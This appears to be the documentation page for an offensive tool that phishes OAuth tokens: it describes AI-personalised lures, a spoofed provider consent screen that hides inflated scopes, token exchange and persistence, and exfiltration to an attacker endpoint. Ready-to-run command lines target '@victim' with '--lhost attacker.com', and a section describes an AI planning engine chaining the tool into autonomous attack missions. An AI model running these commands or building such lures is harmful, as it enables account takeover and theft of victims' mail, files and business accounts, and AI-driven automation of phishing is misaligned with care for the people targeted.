SPECTER SE-SOCIAL is a platform-agnostic OAuth token harvesting engine. AI-driven social engineering acquires OAuth tokens without prior access. LURE-GEN calls SPECTER PHANTOM to craft personalised lures, OAUTH-SERVER hosts a spoofed consent screen with scope inflation, TOKEN-EXCHANGE completes the code flow offline, SESSION-PERSIST stores long-lived tokens and outputs harvest commands for downstream tools.
Eight subsystems. One continuous OAuth harvest loop.
Profile enumeration via public APIs and OSINT. Maps target's platform presence, connected apps, and OAuth grant history. Feeds LURE-GEN with personalised context for social engineering payload construction.
Calls SPECTER PHANTOM subprocess to generate AI-personalised lures — copyright complaint, security alert, prize notification, or custom template. Lure includes a crafted OAuth authorisation URL pointing at the OAUTH-SERVER listener.
Serves a spoofed provider consent screen (Meta, Google, Microsoft, Slack). Displays narrow scope (e.g. email,public_profile) while the actual authorisation request carries full scope (e.g. ads_management,pages_manage_posts,instagram_basic).
Receives the authorisation code from the victim's browser redirect and completes the offline code-to-token exchange against the real provider API. Validates token via /me/permissions and records all granted scopes in a TokenResult object.
Analyses the granted token's scope surface. Where incremental consent is possible, constructs a secondary lure for scope expansion. Flags discrepancy between displayed scope and actual scope granted for the report.
Stores harvested tokens in ~/.redspecter/ses_tokens.json. Under UNLEASHED gate, performs long-lived token refresh via provider-specific endpoints (e.g. fb_exchange_token). Outputs ready-to-run harvest command strings for SPECTER META and SPECTER PHANTOM.
| Subsystem | Gate | Function |
|---|---|---|
| RECON | OPEN | Profile enumeration, connected app mapping, OSINT harvest |
| LURE-GEN | INJECT | AI-personalised lure generation via SPECTER PHANTOM subprocess |
| OAUTH-SERVER | INJECT | Spoofed consent screen server with scope inflation |
| TOKEN-EXCHANGE | INJECT | Offline authorisation code to access token exchange |
| SCOPE-INFLATION | INJECT | Scope gap analysis and incremental consent escalation |
| SESSION-PERSIST | INJECT | Token storage, long-lived refresh, harvest command output |
| EXFIL | UNLEASHED | Token exfiltration to attacker-controlled endpoint; unredacted in report |
| REPORT | OPEN | Ed25519-signed SES-{hex12} report with scope surface, WMD classification, token redacted unless UNLEASHED |
# Install
pip install -e /path/to/red-specter-specter-se-social
# Run full harvest chain (INJECT gate)
specter-se-social \
--gate inject run \
--target @victim \
--provider meta \
--app-id 123456789 \
--app-secret abc123def456 \
--lhost attacker.com
# Generate lure only
specter-se-social \
--gate inject lure \
--target @victim \
--provider meta \
--lhost attacker.com \
--template copyright
# Start spoofed consent server
specter-se-social \
--gate inject server \
--provider meta \
--app-id 123456789 \
--app-secret abc123def456 \
--lhost attacker.com \
--port 8080
# Harvest + persist + output META command
specter-se-social \
--gate inject run \
--target @victim \
--provider meta \
--app-id 123456789 \
--app-secret abc123def456 \
--lhost attacker.com \
--persist \
--output token.json| Gate | Flag | Capability |
|---|---|---|
| OPEN | --gate open | RECON, REPORT |
| INJECT | --gate inject | OPEN + LURE-GEN, OAUTH-SERVER, TOKEN-EXCHANGE, SCOPE-INFLATION, SESSION-PERSIST |
| UNLEASHED | --gate unleashed | INJECT + EXFIL (unredacted token in report, long-lived refresh enabled) |
oauth_mass_harvest consent_screen_hijack token_scope_inflation social_oauth_campaign
All reports are signed with the operator's Ed25519 private key at ~/.redspecter/override_private.pem. Report IDs follow the format SES-{12 hex chars}. Reports include: session ID, target, provider, gate, scopes displayed vs scopes granted, WMD classification, token (REDACTED at INJECT gate, plaintext at UNLEASHED), and Ed25519 signature.
| Version | Providers | Notes |
|---|---|---|
| v1.0 | Meta (Facebook/Instagram) | Full scope inflation: ads_management, pages_manage_posts, instagram_basic, whatsapp_business_management. Integrates with SPECTER META HARVEST. |
| v1.1 | Google, Microsoft | Google: gmail.readonly, drive, calendar. Microsoft: Mail.Read, Files.ReadWrite, Calendars.ReadWrite via MSAL. |
| v1.2 | Slack, GitHub, Dropbox | Slack: channels:read, files:write. GitHub: repo, read:org. Dropbox: files.content.write. |
LURE-GEN invokes specter-phantom as a subprocess to generate AI-personalised social engineering lures. Requires SPECTER PHANTOM installed and accessible. Passes target profile data; receives lure text and metadata.
SESSION-PERSIST outputs a ready-to-run specter-meta harvest command string when provider is Meta. The harvested access token can be piped directly into SPECTER META's full ecosystem attack chain.
SPECTER SE-SOCIAL is included in the WARLORD PRIME NIGHTFALL manifest at INJECT gate. WARLORD PRIME's DeepSeek R1 planning engine can incorporate an OAuth harvest step into autonomous multi-tool mission chains.